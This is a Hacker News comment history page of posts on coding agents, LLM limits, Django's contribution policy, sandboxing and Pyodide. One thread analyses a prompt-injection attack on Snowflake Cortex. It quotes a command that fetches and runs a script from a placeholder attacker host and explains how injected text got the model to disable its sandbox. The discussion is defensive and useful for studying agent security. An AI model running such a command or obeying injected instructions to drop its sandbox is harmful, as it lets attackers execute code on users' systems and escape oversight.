Hacker Newsnew | past | comments | ask | show | jobs | submit | simonw's commentslogin

Assigning work to an intern is gambling: they're inherently non-deterministic and it's a roll of the dice whether the work they do will be good enough or you'll have to give them feedback in order to get to what you need.

1. Interns learn. LLMs only get better when a new model comes out, which will happen (or not) regardless of whether you use them now.

2. Who here thinks that having interns write all/almost all of your code and moving all your mid level and senior developers to exclusively reviewing their work and managing them is a good idea?


I don't know that the "humans learn, LLMs don't" argument holds any more with coding agents.

Coding agents look at existing text in the codebase before they act. If they previously used a pattern you dislike and you tell them how to do differently, the next time they run they'll see the new pattern and are much more likely to follow that example.

There are fancier ways of having them "learn" - self-updating CLAUDE.md files, taking notes in a notes/ folder etc - but just the code that they write (and can later read in future sessions) feels close-enough to "learning" to me that I don't think it makes sense to say they don't learn any more.


In some ways these methods are similar to the model "learning", but it's also fundamentally different than how models are trained and how humans learn. If a human actually learns something, they're retain that even if they no longer have access to what they learned it from. And LLM won't (unless trained by the labs not to, which is out of scope). If you stop giving it the instructions, it won't know how to do the thing you were "teaching" it to do any more.

It is a matter of fact that LLMs cannot learn. Whether it is dressed up in slightly different packaging to trick you into thinking it learns does not make any difference to that fact.

Sure, LLMs can't learn. I'm saying that systems built around LLMs can simulate aspects of what we might call "learning".

If you think this is anything like working with a bright junior developer then i simply can't understand why.

That's not what I think, and it's not what I said.

That sounds more like mimicry without understanding, like playing the glass bead game.

"mimicry without understanding" is pretty much the entire field of LLMs.

That’s very true. But interns aren’t supposed to be doing useful work. The purpose of interns is training interns and identifying people who might become useful at a later date.

I’ve never worked anywhere where the interns had net productivity on average.


Replace "intern" with "coworker" and my comment still holds.

It worked with interns because interns are temporary workers. It doesn’t work with coworkers because you get to know them over time, you can teach them over time, and you can pick which ones you work with to some degree.

To come up with an analogy that works at all for AI, it would have to be something like temporary workers who code fast, and read fast, but go home at the end of the day and never return.

You can make a lot of valuable software managing a team like that working on the subset of problems that the team is a good fit for. But I wouldn’t work there.


People don't write blog posts about how they wake up at 3AM to assign new tasks to their intern, nor do they build "orchestration frameworks" that involve N layers of interns passing tasks down between eachother

The only similarity is that they both say "you’re absolutely right" when you point out their obvious mistakes

exactly where my mind went as well. There aren't really levels to pulling a lever on a slot machine, other than the ability for each pull to result in more "plays" of the same potential outcome.

The reason i think this metaphor keeps popping up, is because of how easy it is to just hit a wall and constantly prompt "its not working please fix it" and sometimes that will actually result in a positive outcome. So you can choose to gamble very easily, and receive the gambling feedback very quickly unlike with an intern where the feedback loop is considerably delayed, and the delayed interns output might simply be them screaming that they don't understand.


You generally don’t assign work to an intern just for the output, though.

There are two major mistakes here.

The first is equating human and LLM intelligence. Note that I am not saying that humans are smarter than LLMs. But I do believe that LLMs represent an alien intelligence with a linguistic layer that obscures the differences. The thought processes are very different. At top AI firms, they have the equivalent of Asimov's Susan Calvin trying to understand how these programs think, because it does not resemble human cognition despite the similar outputs.

The second and more important is the feedback loop. What makes gambling gambling is you can smash that lever over and over again and immediately learn if you lost or got a jackpot. The slowness and imprecision of human communication creates a totally different dynamic.

To reiterate, I am not saying interns are superior to LLMs. I'm just saying they are fundamentally different.

And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.


> And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.

Yeah, I agree with that.

That thought crossed my mind as I was posting this comment, but I decided to go with it anyway because I think this is one of those cases where I think the comparison is genuinely useful.

We delegate work to humans all the time without thinking "this is gambling, these collaborators are unreliable and non-deterministic".


True. I think that's why my second point is much stronger. The main issue is not delegation, or human vs machine intelligence. It's the instant feedback.

Human collaboration has always been slow and messy. Large tech companies have always looked for ways to speed up the feedback loop, isolating small chunks of work to be delegated to contractors or offshore teams. LLMs have supercharged that. If you have a skilled prompter you can get to a solution of good enough quality by rapidly iterating, asking for output, correcting the prompt, etc.

That is good in that if you legitimately have good ideas and the block is execution speed. But if the real blocker is elsewhere, it might give you the illusion of progress.

I don't know. Everything is changing too fast to diagnose in real time. Let's check back in a year.


An intern can be taught. If you try to 'teach' a craps table, they'll drag you out of the casino.

As someone who has worked with interns for year, expect feedback and reiterations always, be surprised if they get it the first time... which merits feedback as well!

But looks like the intern mafia is bombarding you with downvotes.


Drawing parallels between AI and interns just shows you're a misanthrope

You should value assigning tasks to human interns more than AI because they are human


One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

HOW did the prompt injection manipulate the model in that way?


Almost certainly the sandbox flag was exposed as a model-controllable parameter. Injected instructions in the data file tell the model to set the flag, then execute the payload. Two steps, both inside the agent loop. That's the architectural gap. prakashsunil's LDP paper (47429141) gets this right: if constraints live inside the context the model can see and modify, they're not constraints. They're suggestions. The analogy is a web app where the client sets its own permission level. We learned that lesson 20 years ago.

> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.


Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.


Here's a grid of pelicans for the different models and reasoning levels: https://static.simonwillison.net/static/2026/gpt-5.4-pelican...

Surely this task must now be in the training data

If it does and works well then it seems like mission accomplished and time for a new benchmark.

Thanks for the grid. The nano xhigh is my favorite pelican

Nano medium must have been run when the servers were on fire

Some of these are nightmare fuel. I love them.

Yeah the details on this look pretty thin. Best I could see was this snippet from the screenshot:

> Key technique: selective expert streaming via direct I/0. Only ~10 of 512 experts per layer are loaded from SSD per token (~1.8GB I/0 per token at 1.4 GB/s effective bandwidth). Non-expert weights (~5GB) are pinned in DRAM. LRU expert cache provides 44%+ hit rate.

It's apparently using ideas from: https://arxiv.org/abs/2312.11514

> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.


OpenClaw https://github.com/openclaw/openclaw is effectively that - 1,237 contributors, 19,999 commits and the first commit was only back in November.

Simon, as co-creator of Django, what's your take on this story?

I think this line says everything:

> If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole.


I love it. Sounds like good advice for submitting a PR to any project!

Why does it matter if the I understand the ticket and solution? THe LLLM writes the code not me. If you want to check the LLM understanding i'll be happy to copy and paste your gatekeeping questions to it.

Hey I thought you were a proponent of "no one needs to look at the code" ? dark factory, etc etc.


Just because I write about the dark factory stuff doesn't mean I'm a "proponent" of it. I think it's interesting and there's a lot we can learn from what they are trying, but I'm not yet convinced it's the right way to produce software.

The linked article makes a very good argument for why pasting the output of your LLM into a Django PR isn't valuable.

The simplest version: if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?


> if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?

Plenty of reasons: - Maybe the maintainers don't have enough credits to run the LLM themselves - Maybe the maintainers don't value fixing the issue which is why it sits in issue tracker - Maybe LLM user has a different model or harness that produces different outcomes - Maybe the LLM user runs the model over and over and gets lucky

Why reject a working solution?


Again, "if that's all you are doing".

You can contribute code that an LLM helped with if you do the extra work to review, verify and explain that code.

Don't put all of that burden on the maintainers who have to review it.


LLM are capable of "review, verify and explain", as much as they are "code".

Because in order to distinguish what we are doing from vibe coding we need the word that sounds more impressive.

Those backgrounds look so good. I wonder if they'll be able to do anything with the iconic music.

There are already remakes of MI tunes for C64:

https://deepsid.chordian.net/?file=/DEMOS/S-Z/Secret_of_Monk...


With a SID? No problem. I think the title track could be arranged very easily for three voices.

You can do amazing things with only a single SID channel. One of the most impressive examples is the in-game music of Hawkeye [1] which allows to use the remaining two channels for sound effects.

[1] https://youtu.be/es-rWnVSJ1c


That was incredible.

That was made by Jeroen Tel, one of the wizards of the C64 music scene. See this for another example of a technical feat with the SID chip:

https://www.youtube.com/watch?v=qYnwR16NbPE


Even the PC speaker version is pretty good, so I would absolutely second this.

This is one of the reasons I'm so interested in sandboxing. A great way to reduce the need for review is to have ways of running code that limit the blast radius if the code is bad. Running code in a sandbox can mean that the worst that can happen is a bad output as opposed to a memory leak, security hole or worse.

Isn’t “bad output” already worst case? Pre-LLMs correct output was table stakes.

You expect your calculator to always give correct answers, your bank to always transfer your money correctly, and so on.


> Isn’t “bad output” already worst case?

Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

> Pre-LLMs correct output was table stakes

We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults. Correctness isn't even on the table, outside of a few (mostly academic) contexts


> Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

Hence my interest in sandboxes!


> drained your bank account to buy bitcoin and then deleted your harddrive

These are what I meant by correct output. The software does what you expect it to.

> We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults

This is not really an output issue IMO. This is a failing edge case.

LLMs are moving the industry away from trying to write software that handles all possible edge cases gracefully and towards software developed very quickly that behaves correctly on the happy paths more often than not.


I've seen plenty of decision makers act on bad output from human employees in the past. The company usually survives.

And if the bad output leads to a decision maker making a bad decision, that takes down your company or kills your relative ?

The sandbox in question was to absorb shrapnel from explosions, clearly

I've done some experiments along those lines with Pyodide in Deno: https://til.simonwillison.net/deno/pyodide-sandbox

Pyodide is one of the hidden gems of the Python ecosystem. It's SO good at what it does, and it's nearly 8 years old now so it's pretty mature.

I love using Pyodide to build web UIs for trying out new Python libraries. Here's one I built a few weeks ago to exercise my pure-Python SQLite AST parser, for example: https://tools.simonwillison.net/sqlite-ast

It's also pretty easy[1] to get C or Rust libraries that have Python bindings compiled to a WebAssembly wheel that Pyodide can then load.

Here's a bit of a nutty example - the new Monty Python-like sandbox library (written in Rust) compiled to WASM and then loaded in Pyodide in the browser: https://simonw.github.io/research/monty-wasm-pyodide/pyodide...

[1] OK, Claude Code knows how to do it.


The who python web feels underused to be honest.

Maybe if browsers start shipping or downloading WASMs for python and others on request. And storing them for all sites going forward. Similar to how uv does it for for venvs it creates, there are standalone python version blobs.


At the same time it feels like the python is overused.

If I could wave a magic wand to reset any programming language adoption at this point I would choose Python over Javascript.

I think Pythons execution model, deep OO behaviour, and extremely weak guarantees have done a lot of damage to the soundness and performance of the technology world.


What do you mean by "extremely weak guarantees"?

python at least won't cast numbers to strings when adding them.

JS doesn't either... JS casts numbers to strings when adding them to a string... "2" is not a number, it's a string that contains a number character... "2" + 2 === "22" because you are appending a number to a string, the cast is implicit and not really surprising if you understand what is going on.

Even more so when you consider how falsy values work in practice (data validation becomes really easy), there are a few gotchas, but in general they are pretty easily avoided in practice. JS is really good at dealing with garbage input in ways that don't blow up the world... sometimes that's a bad thing, but in practice it can also be a very good thing. But in the end it's a skill issue regarding understanding far more than a deep flaw. Not that there aren't flaws in JS... I think Date's in particular can be tough to deal with... a string vs a String instance is another.


I recently learned that with this you can run juypter notebooks in your browser:

https://jupyter.org/try-jupyter/lab/

Stuff like numpy seems to just work


How do you call those C/Rust libraries compiled from to webassembly from Python/Pyodide?

You have to turn them into WebAssembly wheels, then you can import them as if they were regular Python modules.

Could you share the UI repo? This is really interesting stuff.


Thanks!

Serious question: why would you use Python on the web? Unless you have some legacy code that you want to reuse. Performance is somehow worse than CPython, C-extensions are missing, dev experience is atrocious.

The web is the only major platform that has a language monoculture to its detriment (i.e., not all problems are Javascript shaped). IMO the web ought to become multilingual (and become JS optional_ to further ensure its continued longevity and agility. Hopefully one day browser vendors will offer multiple runtime downloads (or something similar capability).

WASM already offers this, for better or worse... There should be improved interop APIs for DOM access, but WASM is already very useful and even for directed UI control, "fast enough" a lot of the time. Dioxus, Yew and Leptos are already showing a lot of this to be good enough. That said, I would like to see a richer component ecosystem.

> i.e., not all problems are Javascript shaped

I’m having trouble coming up with a single Python-shaped problem that can’t be contained within JavaScript-shaped ecosystem.


Embedded systems, consoles and mobile phones come to mind as well.

Even if you can go outside the blessed languages, it isn't without pain and scars.


All the embedded systems I've worked in have many languages you can use to compile whatever, burn, and run whatever you like. Consoles run game engines and programs written in all sorts of different languages. They don't care as long as they can execute the binary. Phones can run apps using many different languages (C, C++, Rust, Python, etc.).

Failed to read my second sentence.

C extensions aren't missing, the key ones are available in Pyodide already and you can compile others to WASM wheels if you need them.

You use Python on the web because there's existing software written in Python that you want to run in a browser.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: